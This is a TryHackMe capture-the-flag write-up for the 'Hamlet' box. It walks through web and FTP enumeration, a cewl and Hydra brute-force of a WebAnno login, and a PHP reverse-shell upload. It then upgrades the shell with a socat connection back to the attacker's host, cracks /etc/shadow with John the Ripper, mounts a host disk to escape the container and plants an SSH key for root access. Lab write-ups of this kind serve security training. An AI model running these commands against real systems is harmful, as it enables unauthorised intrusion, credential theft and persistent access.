Hamlet – Walkthrough En | TryHackMe – Write-up

Hamlet is a CTF box from tryhackme where it will be necessary to perform a fairly deep enumeration and then put the pieces together with Cewl and Hydra to bypass authentication. In the end, it will be necessary to escape from the container

 

infosec_related

Tags
Non classé (2)Broken Access Control (1)

Enumeration

Command :

nmap -T5 -sV -p- 10.10.78.81

WEB enumeration

On the three web services, you have to parse the directories to see what can be interesting. Operation performed with Dirsearch

Command :

dirsearch -u 10.10.78.81 -x 403

dirsearch -u 10.10.78.81:8000 -x 403

 

dirsearch -u 10.10.78.81:8080 -x 400,401,403,404,500

 

Nothing conclusive appears.

We only go to the port 80 website, we have the possibility of recovering a hamlet.txt file, as well as information concerning Michael ‘ghost’ who seems to be obsessed with a man named Hamlet.

 

On port 8000, there is the same thing, or almost. Indeed, the text on hamlet seems to be the same as on port 80. It is in fact an iframe whose source is at this address : /repository/project/0/document/0/source/hamlet. txt

On port 8080, the site offers to connect in identifiers that we do not have.

 

FTP enumeration:

Access to the FTP server is done with the anonymous account but, for obscure reasons, I could only access it from Firefox.

We retrieve firewall rules with the ufw.status file and password policy rules with the password-policy.md file

At this stage, the password-policy.md file is very interesting because it gives us the length and complexity of the password.

  • a length of 12 to 14 characters
  • all in lowercase
 

Bruteforce login - Cewl - Wordlist

Using cewl and the hamet.txt file, we will create a password list.

Command :

cewl -m 12 –lowercase -w password_list.txt http://10.10.78.81/hamlet.txt

 

Bruteforce Login - Hydra

With this list of words of at least 12 characters, in lower case, we are going to bruteforce the login page with Hydra

Command :

hydra -V -l ghost -P test.txt 10.10.78.81 -s 8080 http-post-form -m “/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login= Login:’Login failed'”

Initial foothold - WebAnno Login

Once connected, you must create a new project. Then you have to add a document to it. Instead of a text file, we will put a reverse shell in PHP. It does not check the contents or the extension of the file.

 
Previous
Next

In the documents tab, you can click on Browse to insert the reverse shell. The shell used is that of pentestmonkey available for direct download at this address. https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

 

Reverse Shell

It only remains to find where it has been recorded. It should be remembered that on port 8000, we had found the location of the document hamlet.txt.

/repository/project/0/document/0/source/hamlet.txt

By replacing the 0 with 1 and hamlet.txt with shell.php, we can find our reverse_shell. The final address : http://10.10.78.81:8000/repository/project/1/document/1/source/shell.php

Before validating the link, you must set up a netcat listener

Command :

nc -nlvp 1234

 

Upgrade shell avec socat.

Python not being installed, nor socat for that matter, it is quite difficult to enumerate the system. To counter this, I will download a socat binary and use it to upgrade the shell.

Link to download socat https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat

It must then be downloaded to the victim machine. WGET not being installed, you have to use CURL

curl -O http://10.11.38.124:8000/socat

With a web server on kali: 

python3.9 -m http.server

Then do his two commands: 

chmod +x socat

Listener on kali :

socat file:`tty`,raw,echo=0 tcp-listen:4444

Command on host :

/tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:10.11.38.124:4444

 

Mouvement horizontal - root

We are in a container, but we have the possibility to break the account password. The shadow file is accessible. After copying the contents of /etc/shadow and /etc/passwd you must use unshadow and johntheripper

Command :

shadow passwd shadow > shadow

john unshadow –format=crypt –wordlist=/usr/share/wordlists/rockyou.txt

Privilege escalation

Now that we are in the root account, we can do all the manipulations possible.

Local enumeration

In /dev you can have a number of disks.

ls -al /dev/ | grep disk

As we can see there are several disks including xvda1 2 and 3.

Only xvda2 can be mounted in a folder. The other two can’t be.

Previous
Next

Once we have mounted the xvda2s in the /mnt/xvda2_fake folder, we can retrieve the root flag. It is also possible to create a private ssh key and use it to connect to the system.

Mounting xvda2

mkdir /mnt/xvda2_fake

mount /dev/xvda2 /mnt/xvda2_fake/

Creation of an id_rsa key

ssh key-gen

copy id_rsa.pub to authorized_keys

echo ‘id_rsa.pub’ >> authorized_keys

ssh connection

chmod 600 id_rsa

ssh root@10.10.78.81 -i id_rsa

#

That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article

Facebook
Twitter
LinkedIn
Pinterest